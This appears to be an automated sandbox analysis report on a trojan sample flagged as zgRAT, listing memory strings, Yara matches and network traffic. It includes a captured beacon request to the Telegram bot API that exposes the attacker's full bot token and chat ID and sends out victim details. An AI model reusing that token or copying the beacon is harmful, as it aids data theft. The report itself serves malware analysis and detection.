Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue1Response
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue2
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue2Response
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue3
Source: InstallUtil.exe, 00000005.00000002.569356286.0000000003710000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue3Response
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: InstallUtil.exe, 00000005.00000002.569356286.0000000003710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.o
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005953000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.o
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005953000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=57010
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: global traffic HTTP traffic detected: GET /bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=5701072641&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%204/26/2023%204:39:15%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.000000000103B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E6128 0_2_050E6128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2BF2 0_2_050E2BF2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2AD8 0_2_050E2AD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3465 0_2_050E3465
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3C18 0_2_050E3C18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2EAC 0_2_050E2EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E34AF 0_2_050E34AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3CD0 0_2_050E3CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3F48 0_2_050E3F48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_06333810 0_2_06333810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A2348 5_2_017A2348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A2338 5_2_017A2338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A4730 5_2_017A4730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A1CC0 5_2_017A1CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A1CB2 5_2_017A1CB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EB200 5_2_030EB200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E2270 5_2_030E2270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E10F0 5_2_030E10F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E9708 5_2_030E9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E3F08 5_2_030E3F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EAEE0 5_2_030EAEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030ED220 5_2_030ED220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EC030 5_2_030EC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E10E0 5_2_030E10E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E1CDC 5_2_030E1CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05600448 5_2_05600448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05603450 5_2_05603450
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003D98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.0000000005364000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.000000000103B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000000.301663644.00000000007E2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHpzplthjq.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.452585400.0000000006420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVxzadyg.dll" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Binary or memory string: OriginalFilenameHpzplthjq.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe ReversingLabs: Detection: 27%
